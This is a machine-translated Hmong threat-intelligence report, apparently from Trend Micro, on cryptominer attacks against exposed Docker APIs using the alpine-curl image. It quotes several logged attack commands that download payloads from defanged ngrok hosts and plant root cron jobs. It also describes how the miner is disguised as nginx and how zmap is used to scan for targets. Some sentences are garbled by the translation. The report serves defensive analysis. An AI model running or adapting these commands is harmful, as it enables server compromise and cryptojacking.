Peb txheeb xyuas cov ntaub ntawv sau los ntawm cov thawv ntim honeypot, uas peb tsim los taug qab kev hem thawj. Thiab peb tau kuaj pom cov haujlwm tseem ceeb los ntawm cov neeg tsis xav tau lossis tsis tau tso cai cov miners cryptocurrency tau siv los ua cov thawv tsis zoo siv cov duab tshaj tawm hauv zej zog ntawm Docker Hub. Cov duab no yog siv los ua ib feem ntawm cov kev pabcuam uas xa cov neeg ua haujlwm tsis zoo cryptocurrency miners.
Tsis tas li ntawd, cov kev pab cuam rau kev ua hauj lwm nrog tes hauj lwm raug teeb tsa kom nkag mus rau qhib cov thawv sib ze thiab cov ntawv thov.
Peb tawm ntawm peb cov honeypots raws li yog, uas yog, nrog lub neej ntawd teeb tsa, tsis muaj kev ntsuas kev nyab xeeb lossis kev teeb tsa tom qab ntawm cov software ntxiv. Thov nco ntsoov tias Docker muaj cov lus pom zoo rau kev teeb tsa thawj zaug kom tsis txhob muaj qhov yuam kev thiab qhov tsis zoo. Tab sis cov honeypots siv yog ntim, tsim los xyuas cov kev tawm tsam ntawm lub thawv ntim khoom, tsis yog cov ntawv thov hauv cov thawv.
Cov kev ua phem uas pom tau kuj tseem ceeb heev vim tias nws tsis tas yuav muaj qhov tsis zoo thiab tseem muaj kev ywj pheej ntawm Docker version. Pom qhov teeb tsa tsis raug, thiab yog li qhib, lub thawv duab yog txhua yam uas cov neeg tawm tsam xav tau kom kis tau ntau lub servers qhib.
Qhov tsis kaw Docker API tso cai rau tus neeg siv ua ntau yam ntawm , suav nrog tau txais cov npe ntawm cov thawv khiav, tau txais cov cav los ntawm ib lub thawv tshwj xeeb, pib, nres (nrog rau kev yuam) thiab txawm tias tsim lub thawv tshiab los ntawm cov duab tshwj xeeb nrog cov chaw teev tseg.
Ntawm sab laug yog txoj kev xa khoom malware. Ntawm sab xis yog tus neeg tawm tsam ib puag ncig, uas tso cai rau cov chaw taws teeb dov tawm ntawm cov duab.
Kev faib tawm los ntawm lub teb chaws ntawm 3762 qhib Docker APIs. Raws li Shodan nrhiav hnub tim 12.02.2019/XNUMX/XNUMX
Attack chain thiab payload xaiv
Kev ua phem tau raug kuaj pom tsis yog nrog kev pab ntawm honeypots xwb. Cov ntaub ntawv los ntawm Shodan qhia tau hais tias tus naj npawb ntawm Docker APIs nthuav tawm (saib daim duab thib ob) tau nce ntxiv txij li peb tau tshawb xyuas lub thawv tsis raug siv los ua tus choj siv Monero cryptocurrency mining software. Lub Kaum Hli xyoo tas los (2018, cov ntaub ntawv tam sim no kwv yees. tus txhais lus) tsuas muaj 856 qhib APIs.
Kev ntsuam xyuas ntawm honeypot cav tau pom tias kev siv lub thawv duab kuj cuam tshuam nrog kev siv , ib qho cuab yeej tsim kom muaj kev sib txuas ruaj ntseg lossis xa mus los ntawm cov ntsiab lus nkag mus rau pej xeem mus rau qhov chaw nyob lossis cov peev txheej (piv txwv li localhost). Qhov no tso cai rau cov neeg tawm tsam los tsim dynamically tsim URLs thaum xa payload rau lub server qhib. Hauv qab no yog cov piv txwv code los ntawm cov cav uas qhia txog kev tsim txom ntawm kev pabcuam ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Raws li koj tau pom, cov ntaub ntawv uploaded yog downloaded los ntawm tas li hloov URLs. Cov URLs no muaj hnub tas sij hawm luv, yog li payloads tsis tuaj yeem rub tawm tom qab hnub tas sijhawm.
Muaj ob txoj kev xaiv payload. Thawj yog muab tso ua ke ELF miner rau Linux (txhais tau tias yog Coinminer.SH.MALXMR.ATNO) uas txuas rau lub pas dej mining. Qhov thib ob yog tsab ntawv (TrojanSpy.SH.ZNETMAP.A) tsim los kom tau txais qee yam cuab yeej network siv los luam theej duab network thiab tom qab ntawd tshawb nrhiav lub hom phiaj tshiab.
Cov ntawv dropper teeb tsa ob qhov sib txawv, uas yog siv los xa cov cryptocurrency miner. Lub HOST variable muaj qhov URL qhov twg cov ntaub ntawv tsis zoo nyob, thiab RIP sib txawv yog cov ntaub ntawv npe (qhov tseeb, tus hash) ntawm cov miner yuav tsum xa mus. Qhov hloov pauv HOST hloov txhua zaus qhov hloov pauv hash hloov pauv. Tsab ntawv kuj tseem sim xyuas tias tsis muaj lwm tus miners cryptocurrency khiav ntawm tus neeg rau zaub mov tawm tsam.
Piv txwv ntawm HOST thiab RIP qhov sib txawv, nrog rau cov lej cim siv los xyuas tias tsis muaj lwm tus miners khiav
Ua ntej pib tus miner, nws yog renamed rau nginx. Lwm cov qauv ntawm tsab ntawv no hloov npe tus miner rau lwm qhov kev pabcuam raug cai uas tuaj yeem muaj nyob hauv Linux ib puag ncig. Qhov no feem ntau yog txaus los hla kev txheeb xyuas tawm tsam cov npe ntawm cov txheej txheem khiav.
Cov ntawv tshawb nrhiav kuj muaj cov yam ntxwv. Nws ua haujlwm nrog tib qhov kev pabcuam URL kom xa cov cuab yeej tsim nyog. Ntawm lawv yog zmap binary, uas yog siv los luam theej duab tes hauj lwm thiab tau txais cov npe qhib chaw nres nkoj. Tsab ntawv kuj tseem thauj lwm binary uas yog siv los cuam tshuam nrog cov kev pabcuam nrhiav pom thiab tau txais banners los ntawm lawv los txiav txim siab cov ntaub ntawv ntxiv txog qhov kev pabcuam pom (piv txwv li, nws version).
Tsab ntawv kuj ua ntej txiav txim siab qee qhov kev sib txuas hauv network los luam theej duab, tab sis qhov no nyob ntawm cov ntawv sau. Nws kuj tau teeb tsa lub hom phiaj chaw nres nkoj los ntawm cov kev pabcuam - hauv qhov no, Docker - ua ntej ua haujlwm scan.
Sai li sai tau cov hom phiaj pom tau, cov chij tau txiav tawm ntawm lawv. Tsab ntawv kuj tseem lim cov hom phiaj nyob ntawm cov kev pabcuam, kev siv, cov khoom siv lossis cov platform uas nyiam: Redis, Jenkins, Drupal, MODX, , Docker 1.16 tus neeg siv khoom thiab Apache CouchDB. Yog hais tias tus neeg rau zaub mov scanned sib tw ib qho ntawm lawv, nws tau txais kev cawmdim hauv cov ntawv nyeem, uas cov neeg tawm tsam tuaj yeem siv tom qab kev tshuaj xyuas thiab kev nyiag. Cov ntawv nyeem cov ntaub ntawv no raug xa mus rau cov neeg tawm tsam cov servers ntawm kev sib txuas dynamic. Ntawd yog, ib qho URL cais siv rau txhua cov ntaub ntawv, uas txhais tau hais tias kev nkag mus tom ntej yog qhov nyuaj.
Qhov kev tawm tsam vector yog Docker duab, raws li tuaj yeem pom hauv ob daim code tom ntej.
Nyob rau sab saum toj yog renaming rau qhov kev pabcuam raug cai, thiab hauv qab yog li cas zmap siv los luam theej duab tes hauj lwm
Nyob rau sab saum toj yog predefined network ranges, hauv qab yog cov chaw nres nkoj tshwj xeeb rau kev tshawb nrhiav cov kev pabcuam, suav nrog Docker
Lub screenshot qhia tau hais tias cov duab alpine-curl tau rub tawm ntau dua 10 lab lub sijhawm
Raws li Alpine Linux thiab curl, cov cuab yeej siv tau zoo CLI rau kev hloov cov ntaub ntawv hla ntau yam kev cai, koj tuaj yeem tsim . Raws li koj tuaj yeem pom hauv daim duab dhau los, cov duab no twb tau rub tawm ntau dua 10 lab lub sijhawm. Ntau qhov kev rub tawm tuaj yeem txhais tau tias siv cov duab no los ua qhov nkag; cov duab no tau hloov kho ntau dua rau lub hlis dhau los; cov neeg siv tsis tau rub tawm lwm cov duab los ntawm qhov chaw cia khoom no ntau zaus. Hauv Docker - ib txheej ntawm cov lus qhia siv los teeb tsa lub thawv kom khiav nws. Yog tias qhov chaw nkag nkag tsis raug (piv txwv li, lub thawv tau qhib los ntawm Is Taws Nem), cov duab tuaj yeem siv los ua tus vector vector. Cov neeg tawm tsam tuaj yeem siv nws los xa cov khoom thauj yog tias lawv pom lub thawv tsis raug lossis qhib lub thawv uas tsis muaj kev txhawb nqa.
Nws yog ib qho tseem ceeb uas yuav tsum nco ntsoov tias daim duab no (alpine-curl) nws tus kheej tsis yog phem, tab sis raws li koj tuaj yeem pom saum toj no, nws tuaj yeem siv los ua cov haujlwm tsis zoo. Cov duab zoo li Docker kuj tuaj yeem siv los ua cov haujlwm phem. Peb tau hu rau Docker thiab ua haujlwm nrog lawv txog qhov teeb meem no.
tswv yim pom zoo
seem rau ntau lub tuam txhab, tshwj xeeb tshaj yog cov kev siv , tsom rau kev loj hlob sai thiab kev xa khoom. Txhua yam yog qhov hnyav dua los ntawm qhov yuav tsum tau ua raws li kev tshuaj xyuas thiab kev saib xyuas cov cai, qhov xav tau los saib xyuas cov ntaub ntawv tsis pub lwm tus paub, nrog rau kev puas tsuaj loj heev los ntawm lawv cov kev tsis ua raws cai. Kev koom ua ke kev ruaj ntseg automation rau hauv txoj kev loj hlob lub neej tsis yog tsuas yog pab koj nrhiav qhov chaw ruaj ntseg uas yuav tsis pom zoo, tab sis nws kuj pab koj txo qis kev ua haujlwm tsis tsim nyog, xws li khiav cov software ntxiv tsim rau txhua qhov pom qhov tsis zoo lossis kev teeb tsa tsis raug tom qab daim ntawv thov raug xa mus.
Qhov xwm txheej tau tham hauv tsab xov xwm no qhia txog qhov yuav tsum tau ua kom muaj kev nyab xeeb los ntawm kev pib, suav nrog cov lus pom zoo hauv qab no:
- Rau cov thawj tswj hwm thiab cov neeg tsim tawm: Nco ntsoov xyuas koj qhov chaw API kom paub tseeb tias txhua yam raug teeb tsa kom tsuas yog lees txais kev thov los ntawm ib tus neeg rau zaub mov tshwj xeeb lossis lub network sab hauv.
- Ua raws li txoj cai tsawg kawg nkaus: xyuas kom meej tias cov duab ntim tau kos npe thiab txheeb xyuas, txwv tsis pub nkag mus rau cov khoom tseem ceeb (cov kev pab cuam lub thawv ntim khoom) thiab ntxiv encryption rau kev sib txuas hauv network.
- Ua raws thiab pab kom muaj kev ruaj ntseg mechanisms, eg. thiab built-in .
- Siv automated scanning ntawm runtimes thiab cov duab kom tau txais cov ntaub ntawv ntxiv txog cov txheej txheem khiav hauv lub thawv (piv txwv li, txhawm rau txheeb xyuas qhov tsis zoo lossis tshawb nrhiav qhov tsis zoo). Kev tswj xyuas daim ntawv thov thiab kev saib xyuas kev ncaj ncees pab taug qab cov kev hloov pauv txawv txav rau cov servers, cov ntaub ntawv, thiab cov cheeb tsam hauv lub cev.
Trendmicro pab pawg DevOps tsim kom muaj kev nyab xeeb, yob tawm sai sai, thiab tso tawm txhua qhov chaw. Trend Micro Muab lub zog muaj zog, ua kom yooj yim dua, thiab kev ruaj ntseg tsis siv neeg hla ib lub koom haum DevOps cov kav dej thiab muab ntau yam kev tiv thaiv kev hem thawj los tiv thaiv lub cev, virtual thiab huab ua haujlwm ntawm lub sijhawm ua haujlwm. Nws kuj ntxiv ntim kev ruaj ntseg nrog и , uas luam theej duab Docker ntim cov duab rau malware thiab qhov tsis zoo ntawm txhua qhov chaw hauv txoj kev loj hlob kav dej los tiv thaiv kev hem thawj ua ntej lawv raug xa mus.
Cov cim ntawm kev sib haum xeeb
Related hashes:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
rau Kev xyaum hais lus qhia tias qhov chaw yuav tsum tau ua ua ntej txhawm rau txo qis qhov tshwm sim los yog zam kom tsis txhob tshwm sim ntawm qhov xwm txheej tau piav qhia saum toj no. Thiab thaum Lub Yim Hli 19-21 ntawm kev siv online Koj tuaj yeem sib tham txog cov teeb meem kev nyab xeeb no thiab zoo sib xws nrog cov npoj yaig thiab cov kws qhia ntawv ntawm lub rooj sib tham, qhov twg txhua tus tuaj yeem hais tawm thiab mloog qhov mob thiab ua tiav ntawm cov neeg ua haujlwm paub txog.
Tau qhov twg los: www.hab.com